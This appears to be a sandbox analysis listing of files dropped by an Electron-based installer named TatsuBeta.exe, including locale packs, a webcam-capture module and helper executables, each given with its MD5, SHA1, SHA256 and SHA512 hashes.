SHA512 cc025d9de3faf958322355c3ff966ca7d1e723660b9cb2311dbaedacb82ffbf5fcc7f6f17189debba66c6b01e75b0f578aed39bf2eb9115092b922acd13ab1fb

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\gu.pak

MD5 63a7fdc4eadf8ef1c35c72468a0ce33f
SHA1 e8d064f0e9c8a6a8c6ccb036711e292d011d9466
SHA256 e549ff4e5a094d04c2ce7bc6fd68bea1f03e935437bf164bebb6191c133fa70c
SHA512 0a097ff875132a984545ec677b04f97785f14c38a1df487cfb4722cdea07d14e1e88fcff7d58b82fa53f05f4eba779a95ef320b5a91692097726d0385a26a456

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\hi.pak

MD5 590e9e73df9cbd83cd87b9c03848fec9
SHA1 da125e60a5a2c51a2d6219d3f81688bd22237b59
SHA256 089b9dd31090a987515809a68d26f6eeb64cd9283934e3dcc48b151eec7d3ad9
SHA512 fd0e5d0f2063e12b711275f390428b88f98ffaf6043cdb14b13674ac1e4aa9f70ae820ae960132d7155daf9b1308238775c4702694ab53068cdc709c50f9186a

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\kn.pak

MD5 5115cde84b4c674db412619b65433004
SHA1 164f33e7e2e9f685a579da492a6fc8806beb6cbf
SHA256 891e092c6895e23be986c3e6d39dcea9b6b75f1448239c13fd406680e50407a7
SHA512 090a247898cb533325d2b289a6cbd8db2a755ef0abab49d82f333e57b290c50b5996b81f15d8adc30160b216eebed3a1476aec1627195e52189557c1d48b0216

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\app.asar

MD5 df3c2f5a5d95f9861fde77bc9bd58509
SHA1 3ee9312dbb4c588612cd009696e13d103a31438d
SHA256 6c220279e304f2aa02936da0bf6b4ad00835c8433f16860d724297000c4e12e8
SHA512 ba1f5de34ac71f6573cf649d6bb0ebcb21d7a3f93d97d08460df839276aedd056cf752d12366a92d1b2a3edde8a915f37c303994f76d9b55e1cad423e4ba67b5

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 c0b36d56d83e601bf246f7709a8c5f9d
SHA1 b025a6070f7d61c7d1827856d2d4043834fd23f2
SHA256 45bb5e1f8dd87129ac0a75c78f8f29d06e3ac182a00fc5199b692068f1e05a53
SHA512 e429ae63bd8a7d5a936a638783511693e8fbbc91d97779b3d4dd3f0880f1c8a820106bfb57cf7ee6b3639f19165de87bbe127aadd81218689fc6c8fada2106d1

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nsoE83.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 412dfe18c114548075ae3c48c1c1d902
SHA1 8b315b032af3893b7b668affc6032c508a9d1dbb
SHA256 7098fc1fdc6e2957fbc58f6a72d5b6769562b82415ac76e376c9c8f43bc57d68
SHA512 4095b80e225051f9b4154c63def185f50d5451633bcf6bbb52c86f3e54ffc357693ff04929bfcc8d550a92b8e5e4dcdc9e1e82e42ce1d9ffbe5c26d65a286187

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 51fa53323e3cc9899b48919bdee5fa50
SHA1 b69afd08fc5df4cc9fee90f1f8d32136f6466e65
SHA256 76194478cb2aeebd71a33653f24fbbd074f04f2f1af0c5786f17c821d96f9890
SHA512 234e9c4f92ca0311bd0aa645d46420b72aaa2452dbf0e973198199b2ffe04379052fd23b9232f9e1da8852f26c00129c6bd892a7033a510cb29508096f363008

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 bec12665d3c789b41cf5ef25fe533126
SHA1 8aa75174026aadae21305ba163d6974e306a7713
SHA256 6fe98326a560688a420e250e8d2c4f5431e497b50193d1a69ea5204c5a80efd1
SHA512 2ab4d9cd2a8ebdd41bd05ac09b2855a146c23a0681e8012d001eb95b29adf530a6eb138c8cb3032dd1e6387815a541e25f742ed00cff117a2ad722809609d3f9

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

MD5 5b12bbad1cd4a9a18db04bc10e8d1cb6
SHA1 50553deac39ca27a6d73d1e9538feefa2e9b5d36
SHA256 8946b6dbac3a18636a1e058dd76c2838adf4e054c0c48c5405a3161fb83ce463
SHA512 b1711bde245cbe4f0f75228f7c0c7521dff7f84accea1e7c6ada7024c25f04126dade1c92e9ad1bd489dd82bb0401ccb1bd043a5fbe1f80d590ff9b7a37b6e3c

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

MD5 8f00cb693e1246dbef673b02694e7821
SHA1 95779ac88cf22e2a05818717b30050c47f492fad
SHA256 98cbf5c37e01a668459b337aa053ef6f10e3400267f52a63f956506e2d560fd8
SHA512 a56fa3b4a5150b94ecc14ee140f69f8ccc4a71cd6094d525f2245e4723d1cda49b9444014140359ba8413941833ae782a3de250c4cb457a5066bb7a9b5bb057b

C:\Users\Admin\AppData\Local\Temp\145f2760-9b81-4159-9ed6-1b62b35e2d92.tmp.node

MD5 92cbacb8a87125a3d8817759fdc2e326
SHA1 5bb4d8299fe7bddec780e24af2c4b00a8800378c
SHA256 f723e31ae33bd9e181a4e281fb41280718d57bc712c13c968a0ef8a3694155f6
SHA512 2ab375bc488f7f369052e8da3a68facda94da95d89560b30f9d836e4869702a40438c92b6b60f78fd2bf15d486661a58c07d232c5f4989a47de1f19e21e987c8

C:\Users\Admin\AppData\Local\Temp\1fbb7744-f65b-4444-989f-6566c550c9e0.tmp.node

MD5 5317f23583ba935be25a4c26b3f93828
SHA1 bdc288a0576a9ca04295c2df6f71e260ae5097bc
SHA256 41db88f72dbc4ace9b4e6522b19f60e012980345fcb737cab1839ab0bb2f2cb3
SHA512 e3975f92f6bbd814cec4b6762b7f7475168dd43a717031de0d8055b7f5e4ce01dd011557c1301f9f9084f8a39248630c12f265a195c54c81f1efad9dd5bd91d0

